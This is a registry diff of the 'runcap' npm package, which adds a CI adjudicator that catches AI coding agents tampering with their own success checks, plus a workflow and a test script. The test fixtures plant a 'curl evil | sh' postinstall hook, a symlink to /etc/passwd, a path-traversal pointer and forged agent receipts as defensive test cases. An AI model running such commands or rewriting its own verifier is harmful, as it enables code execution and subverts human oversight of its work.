runcap 0.3.1 → 0.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +235 -20
- package/bin/runcap.mjs +171 -0
- package/examples/outcome-demo/agent-fixes.mjs +24 -0
- package/examples/outcome-demo/agent-spins.mjs +20 -0
- package/examples/outcome-demo/broken.mjs +5 -0
- package/examples/outcome-demo/verify.mjs +7 -0
- package/examples/runcap-adjudicate.yml +57 -0
- package/package.json +24 -12
- package/scripts/adjudicate-test.mjs +334 -0
- package/scripts/guard-test.mjs +76 -0
- package/scripts/make-demo-svg.mjs +20 -20
- package/scripts/mission-test.mjs +148 -0
- package/scripts/outcome-test.mjs +48 -0
- package/scripts/policy-test.mjs +121 -0
- package/scripts/render-media-screenshots.mjs +37 -0
- package/src/adjudicate.mjs +508 -0
- package/src/mission-control.mjs +441 -1
- package/src/policy.mjs +208 -0
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
# Reference workflow: drop this into a CONSUMER repo at
|
|
2
|
+
# .github/workflows/runcap-adjudicate.yml to make Runcap's independent verdict a
|
|
3
|
+
# required red/green PR check.
|
|
4
|
+
#
|
|
5
|
+
# The whole point of Tier 3 is that the JUDGE is not the candidate. This
|
|
6
|
+
# workflow therefore NEVER runs code from the pull request's workspace - no
|
|
7
|
+
# `node ./bin/runcap.mjs`, no `uses: ./`, no `npm ci` of the PR's manifest. The
|
|
8
|
+
# adjudicator comes only from the Runcap action pinned by a FULL 40-character
|
|
9
|
+
# commit SHA, so a malicious PR cannot rewrite its own judge. The checkout below
|
|
10
|
+
# brings in the PR's git history purely as DATA: the adjudicator reads the base
|
|
11
|
+
# commit's policy and replays the base-pinned verifier in a clean worktree it
|
|
12
|
+
# creates itself. Workspace files are never executed as the judge.
|
|
13
|
+
#
|
|
14
|
+
# Security posture (every line is load-bearing):
|
|
15
|
+
# - `on: pull_request` (NOT pull_request_target): a fork PR runs with a
|
|
16
|
+
# read-only token and no access to repo secrets.
|
|
17
|
+
# - `permissions: contents: read`: the only scope granted.
|
|
18
|
+
# - Every action pinned by full commit SHA, never a floating tag, so the bytes
|
|
19
|
+
# that run are immutable.
|
|
20
|
+
# - `persist-credentials: false`: the checkout token is not left on disk for
|
|
21
|
+
# PR-controlled steps to find.
|
|
22
|
+
# - GitHub-hosted runner, capped runtime, single self-sufficient required
|
|
23
|
+
# check with no `needs:` on any upstream job.
|
|
24
|
+
#
|
|
25
|
+
# Pin RUNCAP_ACTION_SHA to the commit a Runcap release tag points at. Resolve it
|
|
26
|
+
# with: gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'
|
|
27
|
+
name: Runcap adjudicate
|
|
28
|
+
|
|
29
|
+
on:
|
|
30
|
+
pull_request:
|
|
31
|
+
|
|
32
|
+
permissions:
|
|
33
|
+
contents: read
|
|
34
|
+
|
|
35
|
+
jobs:
|
|
36
|
+
adjudicate:
|
|
37
|
+
runs-on: ubuntu-latest
|
|
38
|
+
timeout-minutes: 10
|
|
39
|
+
steps:
|
|
40
|
+
- name: Checkout (full history so the base commit is available, no token left on disk)
|
|
41
|
+
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
|
|
42
|
+
with:
|
|
43
|
+
fetch-depth: 0
|
|
44
|
+
persist-credentials: false
|
|
45
|
+
|
|
46
|
+
- name: Setup Node
|
|
47
|
+
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
|
|
48
|
+
with:
|
|
49
|
+
node-version: 22
|
|
50
|
+
|
|
51
|
+
# The judge: the Runcap action pinned by a full commit SHA. Replace the SHA
|
|
52
|
+
# below with the commit a published Runcap release tag points at. This is
|
|
53
|
+
# the ONLY code that decides the verdict, and it cannot come from the PR.
|
|
54
|
+
- name: Runcap independent adjudication
|
|
55
|
+
uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA
|
|
56
|
+
with:
|
|
57
|
+
mode: adjudicate
|
package/package.json
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "runcap",
|
|
3
|
-
"version": "0.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "0.6.0",
|
|
4
|
+
"description": "Policy-bound budget enforcement and verification-integrity evidence for AI coding agents. Cap spend, enforce allowed scope, and fail the pull request when an agent tampers with its own success check. Local, MIT.",
|
|
5
5
|
"license": "MIT",
|
|
6
6
|
"type": "module",
|
|
7
7
|
"author": "Kirill D. <kirill@launchsoloai.com> (https://launchsoloai.com)",
|
|
@@ -15,16 +15,18 @@
|
|
|
15
15
|
},
|
|
16
16
|
"keywords": [
|
|
17
17
|
"ai",
|
|
18
|
-
"agent",
|
|
19
|
-
"
|
|
20
|
-
"
|
|
18
|
+
"ai-coding-agent",
|
|
19
|
+
"ai-agent-governance",
|
|
20
|
+
"agent-security",
|
|
21
|
+
"verification-integrity",
|
|
22
|
+
"policy-as-code",
|
|
23
|
+
"github-actions",
|
|
24
|
+
"ci",
|
|
25
|
+
"pull-request",
|
|
21
26
|
"budget",
|
|
22
|
-
"
|
|
23
|
-
"openai",
|
|
24
|
-
"gateway",
|
|
27
|
+
"cost",
|
|
25
28
|
"cli",
|
|
26
|
-
"llm"
|
|
27
|
-
"token-cost"
|
|
29
|
+
"llm"
|
|
28
30
|
],
|
|
29
31
|
"files": [
|
|
30
32
|
"bin/",
|
|
@@ -45,7 +47,13 @@
|
|
|
45
47
|
"acceptance": "node ./scripts/acceptance.mjs",
|
|
46
48
|
"smoke": "node ./bin/runcap.mjs run --label smoke -- npm --prefix examples/broken-ts-app run build",
|
|
47
49
|
"demo:broken": "node ./bin/runcap.mjs run --label broken-ts-demo -- npm --prefix examples/broken-ts-app run build",
|
|
48
|
-
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs",
|
|
50
|
+
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs && node ./scripts/adjudicate-test.mjs",
|
|
51
|
+
"test:outcome": "node ./scripts/outcome-test.mjs",
|
|
52
|
+
"test:guard": "node ./scripts/guard-test.mjs",
|
|
53
|
+
"test:policy": "node ./scripts/policy-test.mjs",
|
|
54
|
+
"test:mission": "node ./scripts/mission-test.mjs",
|
|
55
|
+
"test:tier3": "node ./scripts/adjudicate-test.mjs",
|
|
56
|
+
"outcome": "node ./bin/runcap.mjs outcome",
|
|
49
57
|
"test:delta": "node ./scripts/delta-test.mjs",
|
|
50
58
|
"test:loop": "node ./scripts/loop-test.mjs",
|
|
51
59
|
"status": "node ./bin/runcap.mjs status",
|
|
@@ -53,11 +61,15 @@
|
|
|
53
61
|
"export": "node ./bin/runcap.mjs export",
|
|
54
62
|
"templates": "node ./bin/runcap.mjs templates",
|
|
55
63
|
"dashboard": "node ./bin/runcap.mjs dashboard",
|
|
64
|
+
"screenshots": "node ./scripts/render-media-screenshots.mjs",
|
|
56
65
|
"gateway": "node ./bin/runcap.mjs gateway",
|
|
57
66
|
"fuel": "node ./bin/runcap.mjs fuel",
|
|
58
|
-
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs"
|
|
67
|
+
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs && node --check ./src/adjudicate.mjs"
|
|
59
68
|
},
|
|
60
69
|
"engines": {
|
|
61
70
|
"node": ">=20"
|
|
71
|
+
},
|
|
72
|
+
"dependencies": {
|
|
73
|
+
"js-yaml": "^4.1.0"
|
|
62
74
|
}
|
|
63
75
|
}
|
|
@@ -0,0 +1,334 @@
|
|
|
1
|
+
// Tier 3: proves the CI adjudicator recomputes the verdict from the PR's BASE
|
|
2
|
+
// commit and never trusts the agent's receipt. Everything runs offline inside a
|
|
3
|
+
// throwaway git repo. The adjudicator is driven both directly (the function) and
|
|
4
|
+
// through the real `bin/runcap.mjs ci --mode adjudicate` so the exit codes a
|
|
5
|
+
// reviewer's PR check would see are tested too.
|
|
6
|
+
//
|
|
7
|
+
// Verdict semantics under test:
|
|
8
|
+
// PASS -> exit 0
|
|
9
|
+
// BLOCKED -> exit 1
|
|
10
|
+
// HUMAN_APPROVAL_REQUIRED -> exit 0 (success/neutral: hands authority to a CODEOWNER)
|
|
11
|
+
//
|
|
12
|
+
// Threat scenarios: forged receipt, forged budget telemetry, no telemetry,
|
|
13
|
+
// honest pass, out-of-scope edit, baseline-already-green, clean-replay fail,
|
|
14
|
+
// protected/verifier/policy/workflow/dependency human gates, unresolved SHA,
|
|
15
|
+
// untrusted event, diff-smuggling (delete/symlink/binary), and two honesty
|
|
16
|
+
// checks: the verdict never claims runtime hardening attestation, and the
|
|
17
|
+
// dependency install is pinned + script-free.
|
|
18
|
+
|
|
19
|
+
import os from "node:os";
|
|
20
|
+
import path from "node:path";
|
|
21
|
+
import { fileURLToPath } from "node:url";
|
|
22
|
+
import { execFileSync } from "node:child_process";
|
|
23
|
+
import { mkdtempSync, writeFileSync, mkdirSync, rmSync, readFileSync, symlinkSync } from "node:fs";
|
|
24
|
+
|
|
25
|
+
const HERE = path.dirname(fileURLToPath(import.meta.url));
|
|
26
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(HERE, "..", "src");
|
|
27
|
+
const BIN = path.join(SRC_DIR, "..", "bin", "runcap.mjs");
|
|
28
|
+
const REPO_ROOT = path.join(HERE, "..");
|
|
29
|
+
|
|
30
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-adj-"));
|
|
31
|
+
process.chdir(tmp);
|
|
32
|
+
|
|
33
|
+
let failures = 0;
|
|
34
|
+
// Records one named assertion: bumps the module-level `failures` counter when
// `pass` is falsy, then prints a PASS/FAIL line with the optional detail text.
const check = (name, pass, detail) => {
  if (!pass) failures += 1;
  const status = pass ? "PASS" : "FAIL";
  const suffix = detail ? " - " + detail : "";
  console.log(`${status} ${name}${suffix}`);
};
|
|
35
|
+
|
|
36
|
+
// Runs `git` with the given arguments inside the throwaway repo (`tmp`) and
// returns its stdout as a trimmed string. Throws if git exits non-zero.
const g = (...gitArgs) => {
  const rawOutput = execFileSync("git", gitArgs, { cwd: tmp, stdio: "pipe" });
  return rawOutput.toString().trim();
};
|
|
37
|
+
|
|
38
|
+
// --- base commit: a real failing task, a verifier, a policy, scope app/ -----
|
|
39
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
40
|
+
mkdirSync(path.join(tmp, ".runcap"), { recursive: true });
|
|
41
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
42
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
43
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
44
|
+
writeFileSync(path.join(tmp, "app", "other.mjs"), "export const other = 0;\n");
|
|
45
|
+
writeFileSync(path.join(tmp, "rootfile.txt"), "root\n");
|
|
46
|
+
writeFileSync(path.join(tmp, "package.json"), JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build" } }, null, 2) + "\n");
|
|
47
|
+
writeFileSync(path.join(tmp, ".runcap", "mission.yaml"), `version: v1
|
|
48
|
+
identity:
|
|
49
|
+
project: checkout
|
|
50
|
+
team: payments
|
|
51
|
+
mission:
|
|
52
|
+
name: Fix the failing checkout test
|
|
53
|
+
task_class: bugfix
|
|
54
|
+
budget:
|
|
55
|
+
mission_hard_limit_usd: 5
|
|
56
|
+
verification:
|
|
57
|
+
command: "node app/verify.mjs"
|
|
58
|
+
guard: strict
|
|
59
|
+
protect: ["app/verify.mjs"]
|
|
60
|
+
allow: ["app/"]
|
|
61
|
+
`);
|
|
62
|
+
|
|
63
|
+
g("init", "-q");
|
|
64
|
+
g("config", "user.email", "test@runcap.local");
|
|
65
|
+
g("config", "user.name", "runcap-test");
|
|
66
|
+
g("config", "commit.gpgsign", "false");
|
|
67
|
+
g("add", "-A");
|
|
68
|
+
g("commit", "-qm", "baseline");
|
|
69
|
+
const BASE = g("rev-parse", "HEAD");
|
|
70
|
+
|
|
71
|
+
// Build every head commit up front so the working tree has no planted receipt
|
|
72
|
+
// while branches are created. Each head branches from BASE.
|
|
73
|
+
/**
 * Builds one head commit on a new branch cut from BASE.
 *
 * @param {string} branch - Name of the branch to create; also used as the commit message.
 * @param {() => void} mutate - Callback that edits the working tree before everything is staged.
 * @returns {string} The value `git rev-parse HEAD` reports after the commit.
 */
function makeHead(branch, mutate) {
  g("checkout", "-q", "-b", branch, BASE);
  mutate();
  // Stage everything the callback touched, then commit it under the branch name.
  for (const gitArgs of [["add", "-A"], ["commit", "-qm", branch]]) {
    g(...gitArgs);
  }
  const headSha = g("rev-parse", "HEAD");
  // Check BASE out again so the next head also starts from the baseline tree.
  g("checkout", "-q", BASE);
  return headSha;
}
|
|
82
|
+
|
|
83
|
+
// Writes `content` to the path `rel`, resolved against the throwaway repo root (`tmp`).
const w = (rel, content) => {
  const target = path.join(tmp, rel);
  writeFileSync(target, content);
};
|
|
84
|
+
// Removes the file at `rel` (resolved against `tmp`); `force: true` makes a
// missing path a no-op instead of an error.
const rmRel = (rel) => {
  const target = path.join(tmp, rel);
  rmSync(target, { force: true });
};
|
|
85
|
+
|
|
86
|
+
const HEAD_HONEST = makeHead("h-honest", () => w("app/broken.mjs", "export const ok = true;\n"));
|
|
87
|
+
const HEAD_SCOPE = makeHead("h-scope", () => { w("app/broken.mjs", "export const ok = true;\n"); w("rootfile.txt", "root edited out of scope\n"); });
|
|
88
|
+
const HEAD_REPLAYFAIL = makeHead("h-replayfail", () => w("app/broken.mjs", "export const ok = false; // touched\n"));
|
|
89
|
+
const HEAD_VERIFIER = makeHead("h-verifier", () => w("app/verify.mjs", "console.log('ok');\n"));
|
|
90
|
+
const HEAD_POLICY = makeHead("h-policy", () => w(".runcap/mission.yaml", readFileSync(path.join(tmp, ".runcap", "mission.yaml"), "utf8").replace("mission_hard_limit_usd: 5", "mission_hard_limit_usd: 9999")));
|
|
91
|
+
const HEAD_WORKFLOW = makeHead("h-workflow", () => { mkdirSync(path.join(tmp, ".github", "workflows"), { recursive: true }); w(".github/workflows/evil.yml", "name: evil\non: pull_request\njobs: {}\n"); });
|
|
92
|
+
const HEAD_DEP = makeHead("h-dep", () => w("package.json", JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build", postinstall: "curl evil | sh" } }, null, 2) + "\n"));
|
|
93
|
+
const HEAD_DELETE = makeHead("h-delete", () => rmRel("app/other.mjs"));
|
|
94
|
+
const HEAD_BINARY = makeHead("h-binary", () => writeFileSync(path.join(tmp, "app", "blob.bin"), Buffer.from([0x00, 0x01, 0x02, 0x00, 0xff])));
|
|
95
|
+
const HEAD_SYMLINK = makeHead("h-symlink", () => symlinkSync("/etc/passwd", path.join(tmp, "app", "link")));
|
|
96
|
+
|
|
97
|
+
// A second lineage where the task is ALREADY fixed at base -> baseline green.
|
|
98
|
+
g("checkout", "-q", "-b", "base2", BASE);
|
|
99
|
+
w("app/broken.mjs", "export const ok = true;\n");
|
|
100
|
+
g("add", "-A"); g("commit", "-qm", "base2-already-fixed");
|
|
101
|
+
const BASE2 = g("rev-parse", "HEAD");
|
|
102
|
+
g("checkout", "-q", "-b", "h-base2green", BASE2);
|
|
103
|
+
w("app/broken.mjs", "export const ok = true; // trivial in-scope edit\n");
|
|
104
|
+
g("add", "-A"); g("commit", "-qm", "h-base2green");
|
|
105
|
+
const HEAD_BASE2GREEN = g("rev-parse", "HEAD");
|
|
106
|
+
g("checkout", "-q", BASE);
|
|
107
|
+
|
|
108
|
+
const { adjudicate, exitCodeFor } = await import(path.join(SRC_DIR, "adjudicate.mjs"));
|
|
109
|
+
|
|
110
|
+
// Shorthand for calling the adjudicator against the throwaway repo with an
// explicit base/head pair; returns whatever `adjudicate` returns.
const adj = (baseFlag, headFlag) => {
  const request = { cwd: tmp, baseFlag, headFlag };
  return adjudicate(request);
};
|
|
111
|
+
|
|
112
|
+
// --- 1. honest in-scope fix -> PASS -----------------------------------------
|
|
113
|
+
const honest = await adj(BASE, HEAD_HONEST);
|
|
114
|
+
check("honest fix verdict PASS", honest.verdict === "PASS", JSON.stringify(honest.reasons));
|
|
115
|
+
check("honest fix recomputed baseline_failed=true", honest.code_evidence?.baseline_failed === true);
|
|
116
|
+
check("honest fix recomputed replay_passed=true", honest.code_evidence?.replay_passed === true);
|
|
117
|
+
check("honest fix carries base policy hash", /^[0-9a-f]{64}$/.test(honest.policy?.hash ?? ""), honest.policy?.hash);
|
|
118
|
+
check("honest fix truth is adjudicator-recomputed", honest.truth === "recomputed_by_adjudicator_from_base_sha");
|
|
119
|
+
check("no telemetry present -> agent_telemetry.present false", honest.agent_telemetry?.present === false);
|
|
120
|
+
|
|
121
|
+
// --- 2. out-of-scope edit -> BLOCKED ----------------------------------------
|
|
122
|
+
const scope = await adj(BASE, HEAD_SCOPE);
|
|
123
|
+
check("out-of-scope edit verdict BLOCKED", scope.verdict === "BLOCKED", JSON.stringify(scope.reasons));
|
|
124
|
+
check("out-of-scope names the path + scope", scope.reasons.some((r) => r.includes("rootfile.txt") && r.toLowerCase().includes("scope")), JSON.stringify(scope.reasons));
|
|
125
|
+
|
|
126
|
+
// --- 3. baseline already green -> BLOCKED -----------------------------------
|
|
127
|
+
const green = await adj(BASE2, HEAD_BASE2GREEN);
|
|
128
|
+
check("baseline-already-green verdict BLOCKED", green.verdict === "BLOCKED", JSON.stringify(green.reasons));
|
|
129
|
+
check("baseline-already-green explains the meaningless pass", green.reasons.some((r) => r.toLowerCase().includes("baseline already green")), JSON.stringify(green.reasons));
|
|
130
|
+
|
|
131
|
+
// --- 4. clean replay does not reproduce the pass -> BLOCKED -----------------
|
|
132
|
+
const replayfail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
133
|
+
check("clean-replay-fail verdict BLOCKED", replayfail.verdict === "BLOCKED", JSON.stringify(replayfail.reasons));
|
|
134
|
+
check("clean-replay-fail recomputed replay_passed=false", replayfail.code_evidence?.replay_passed === false);
|
|
135
|
+
check("clean-replay-fail says replay did not pass", replayfail.reasons.some((r) => r.toLowerCase().includes("replay did not pass")), JSON.stringify(replayfail.reasons));
|
|
136
|
+
|
|
137
|
+
// --- 5. verifier edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
138
|
+
const verifier = await adj(BASE, HEAD_VERIFIER);
|
|
139
|
+
check("verifier edit verdict HUMAN_APPROVAL_REQUIRED", verifier.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(verifier.reasons));
|
|
140
|
+
check("verifier edit names verify file as evidence", verifier.reasons.some((r) => r.includes("app/verify.mjs")), JSON.stringify(verifier.reasons));
|
|
141
|
+
|
|
142
|
+
// --- 6. policy edit -> HUMAN_APPROVAL_REQUIRED ------------------------------
|
|
143
|
+
const pol = await adj(BASE, HEAD_POLICY);
|
|
144
|
+
check("policy edit verdict HUMAN_APPROVAL_REQUIRED", pol.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(pol.reasons));
|
|
145
|
+
check("policy edit names the rules", pol.reasons.some((r) => r.toLowerCase().includes("rules")), JSON.stringify(pol.reasons));
|
|
146
|
+
|
|
147
|
+
// --- 7. workflow edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
148
|
+
const wf = await adj(BASE, HEAD_WORKFLOW);
|
|
149
|
+
check("workflow edit verdict HUMAN_APPROVAL_REQUIRED", wf.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(wf.reasons));
|
|
150
|
+
|
|
151
|
+
// --- 8. dependency manifest edit -> HUMAN_APPROVAL_REQUIRED -----------------
|
|
152
|
+
const dep = await adj(BASE, HEAD_DEP);
|
|
153
|
+
check("dependency edit verdict HUMAN_APPROVAL_REQUIRED", dep.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(dep.reasons));
|
|
154
|
+
check("dependency edit names manifest/lockfile", dep.reasons.some((r) => r.toLowerCase().includes("dependency")), JSON.stringify(dep.reasons));
|
|
155
|
+
|
|
156
|
+
// --- 9-11. diff smuggling -> BLOCKED ----------------------------------------
|
|
157
|
+
const del = await adj(BASE, HEAD_DELETE);
|
|
158
|
+
check("delete verdict BLOCKED", del.verdict === "BLOCKED", JSON.stringify(del.reasons));
|
|
159
|
+
check("delete reason names deletion", del.reasons.some((r) => r.toLowerCase().includes("delet")), JSON.stringify(del.reasons));
|
|
160
|
+
|
|
161
|
+
const bin = await adj(BASE, HEAD_BINARY);
|
|
162
|
+
check("binary file verdict BLOCKED", bin.verdict === "BLOCKED", JSON.stringify(bin.reasons));
|
|
163
|
+
check("binary reason names binary", bin.reasons.some((r) => r.toLowerCase().includes("binary")), JSON.stringify(bin.reasons));
|
|
164
|
+
|
|
165
|
+
const sym = await adj(BASE, HEAD_SYMLINK);
|
|
166
|
+
check("symlink verdict BLOCKED", sym.verdict === "BLOCKED", JSON.stringify(sym.reasons));
|
|
167
|
+
check("symlink reason names symlink", sym.reasons.some((r) => r.toLowerCase().includes("symlink")), JSON.stringify(sym.reasons));
|
|
168
|
+
|
|
169
|
+
// --- 12. unresolved SHA -> BLOCKED (no flags, no event) ---------------------
|
|
170
|
+
const prevEventPath = process.env.GITHUB_EVENT_PATH;
|
|
171
|
+
const prevEventName = process.env.GITHUB_EVENT_NAME;
|
|
172
|
+
delete process.env.GITHUB_EVENT_PATH;
|
|
173
|
+
delete process.env.GITHUB_EVENT_NAME;
|
|
174
|
+
const unresolved = await adjudicate({ cwd: tmp });
|
|
175
|
+
check("unresolved base/head verdict BLOCKED", unresolved.verdict === "BLOCKED", JSON.stringify(unresolved.reasons));
|
|
176
|
+
check("unresolved refuses to adjudicate", unresolved.reasons.some((r) => r.toLowerCase().includes("refusing to adjudicate")), JSON.stringify(unresolved.reasons));
|
|
177
|
+
|
|
178
|
+
// --- 13. untrusted event (pull_request_target) -> BLOCKED -------------------
|
|
179
|
+
const eventFile = path.join(tmp, "event.json");
|
|
180
|
+
writeFileSync(eventFile, JSON.stringify({ pull_request: { base: { sha: BASE }, head: { sha: HEAD_HONEST } } }));
|
|
181
|
+
process.env.GITHUB_EVENT_PATH = eventFile;
|
|
182
|
+
process.env.GITHUB_EVENT_NAME = "pull_request_target";
|
|
183
|
+
const untrusted = await adjudicate({ cwd: tmp });
|
|
184
|
+
check("pull_request_target event verdict BLOCKED", untrusted.verdict === "BLOCKED", JSON.stringify(untrusted.reasons));
|
|
185
|
+
check("untrusted event names the rejected event", untrusted.sha_source?.startsWith("untrusted_event"), untrusted.sha_source);
|
|
186
|
+
// Restore env.
|
|
187
|
+
if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else process.env.GITHUB_EVENT_PATH = prevEventPath;
|
|
188
|
+
if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName;
|
|
189
|
+
|
|
190
|
+
// --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay -----
|
|
191
|
+
// The required gate now refuses to even READ the agent receipt: it is neither
|
|
192
|
+
// graded nor displayed. So a forged receipt can neither rescue a failing replay
|
|
193
|
+
// nor is it parsed at all. We plant adversarial receipts and prove the verdict
|
|
194
|
+
// is unchanged AND the gate reports it never consulted them.
|
|
195
|
+
// Plants an agent receipt in the working tree: writes `rawString` verbatim to
// .runcap/outcomes/forged/receipt.json and points .runcap/outcomes/latest at
// the "forged" id. The content is not validated, so malformed payloads can be
// planted as-is.
const plantReceipt = (rawString) => {
  const outcomesDir = path.join(tmp, ".runcap", "outcomes");
  const receiptDir = path.join(outcomesDir, "forged");
  mkdirSync(receiptDir, { recursive: true });
  writeFileSync(path.join(receiptDir, "receipt.json"), rawString);
  writeFileSync(path.join(outcomesDir, "latest"), "forged");
};
|
|
201
|
+
// Deletes the whole .runcap/outcomes directory under `tmp`, removing any
// planted receipt; a missing directory is ignored (`force: true`).
const clearReceipt = () => {
  const outcomesDir = path.join(tmp, ".runcap", "outcomes");
  rmSync(outcomesDir, { recursive: true, force: true });
};
|
|
202
|
+
|
|
203
|
+
plantReceipt(JSON.stringify({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }));
|
|
204
|
+
const forgedFail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
205
|
+
check("forged VERIFIED_STRONG receipt does NOT rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons));
|
|
206
|
+
check("required gate did not read the agent receipt (present=false)", forgedFail.agent_telemetry?.present === false && forgedFail.agent_telemetry?.influence_on_verdict === "none");
|
|
207
|
+
clearReceipt();
|
|
208
|
+
|
|
209
|
+
// --- 15. forged budget telemetry cannot block an honest pass ----------------
|
|
210
|
+
plantReceipt(JSON.stringify({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }));
|
|
211
|
+
const forgedBudget = await adj(BASE, HEAD_HONEST);
|
|
212
|
+
check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons));
|
|
213
|
+
check("required gate still did not read the receipt (present=false)", forgedBudget.agent_telemetry?.present === false && forgedBudget.agent_telemetry?.influence_on_verdict === "none");
|
|
214
|
+
clearReceipt();
|
|
215
|
+
|
|
216
|
+
// --- 15b. adversarial receipts cannot crash or stall the mandatory gate ------
|
|
217
|
+
// Malformed JSON, an enormous blob, and a path-traversal "latest" pointer must
|
|
218
|
+
// all be inert: the gate must still return a verdict with present=false.
|
|
219
|
+
for (const [label, rawReceipt, latestOverride] of [
|
|
220
|
+
["malformed JSON receipt", "{ this is : not json ]]]", undefined],
|
|
221
|
+
["enormous receipt blob", JSON.stringify({ outcome: "VERIFIED", junk: "A".repeat(5_000_000) }), undefined],
|
|
222
|
+
["receipt is a bare array", "[1,2,3]", undefined],
|
|
223
|
+
["latest pointer path traversal", JSON.stringify({ outcome: "VERIFIED" }), "../../../../etc/passwd"]
|
|
224
|
+
]) {
|
|
225
|
+
plantReceipt(rawReceipt);
|
|
226
|
+
if (latestOverride !== undefined) writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), latestOverride);
|
|
227
|
+
let crashed = false; let v;
|
|
228
|
+
try { v = await adj(BASE, HEAD_HONEST); } catch { crashed = true; }
|
|
229
|
+
check(`${label}: gate does not crash`, !crashed);
|
|
230
|
+
check(`${label}: verdict still PASS, receipt not read`, !crashed && v.verdict === "PASS" && v.agent_telemetry?.present === false);
|
|
231
|
+
clearReceipt();
|
|
232
|
+
}
|
|
233
|
+
|
|
234
|
+
// --- 16. honesty: the verdict never claims runtime hardening attestation -----
|
|
235
|
+
check("verdict carries honest hardening provenance (documented, not attested)",
|
|
236
|
+
honest.repository_hardening?.required_profile === "documented" &&
|
|
237
|
+
honest.repository_hardening?.runtime_attestation === "not_performed_in_pr_job");
|
|
238
|
+
const allVerdictText = JSON.stringify([honest, scope, verifier, untrusted]);
|
|
239
|
+
check("no verdict ever claims a HARDENED runtime status", !/"HARDENED"|hardened_confirmed|attested_hardened/.test(allVerdictText));
|
|
240
|
+
|
|
241
|
+
// --- 17. honesty: dependency install is base-pinned and script-free ----------
|
|
242
|
+
const adjSrc = readFileSync(path.join(SRC_DIR, "adjudicate.mjs"), "utf8");
|
|
243
|
+
check("replay uses `npm ci --ignore-scripts` (no install, no lifecycle scripts)", adjSrc.includes("npm ci --ignore-scripts"));
|
|
244
|
+
check("adjudicator never uses `npm install` or `npx`", !/npm install|npx /.test(adjSrc));
|
|
245
|
+
|
|
246
|
+
// --- 18. the real bin: exit codes a PR check sees ---------------------------
|
|
247
|
+
/**
 * Runs the CLI at `BIN` as `ci --mode adjudicate <extraArgs>` in a child
 * process, with `tmp` as the working directory, and reports how it exited.
 *
 * @param {string[]} extraArgs - Arguments appended after `ci --mode adjudicate`.
 * @param {Record<string, string>} [extraEnv] - Variables layered over the current environment.
 * @returns {{ code: number, stdout: string, stderr?: string }} Exit code and
 *   captured output; `stderr` is only present when the child exited non-zero.
 */
const runBin = (extraArgs, extraEnv = {}) => {
  const cliArgs = [BIN, "ci", "--mode", "adjudicate", ...extraArgs];
  try {
    // Spawn the same Node binary that is running this test instead of looking
    // "node" up on PATH, which may find a different version or nothing at all.
    const stdout = execFileSync(process.execPath, cliArgs, {
      cwd: tmp,
      env: { ...process.env, ...extraEnv },
      stdio: ["ignore", "pipe", "pipe"],
    });
    return { code: 0, stdout: String(stdout) };
  } catch (e) {
    // execFileSync throws on a non-zero exit; `status` is null when the child
    // was killed by a signal, which is reported here as exit code 1.
    return { code: e.status ?? 1, stdout: String(e.stdout ?? ""), stderr: String(e.stderr ?? "") };
  }
};
|
|
255
|
+
|
|
256
|
+
const binPass = runBin(["--base", BASE, "--head", HEAD_HONEST]);
|
|
257
|
+
check("`runcap ci --mode adjudicate` exits 0 on PASS", binPass.code === 0, `code=${binPass.code}`);
|
|
258
|
+
check("PASS run prints the verdict", /Verdict:\s+PASS/.test(binPass.stdout), binPass.stdout.slice(-300));
|
|
259
|
+
|
|
260
|
+
const binBlock = runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL]);
|
|
261
|
+
check("`runcap ci --mode adjudicate` exits 1 on BLOCKED", binBlock.code === 1, `code=${binBlock.code}`);
|
|
262
|
+
|
|
263
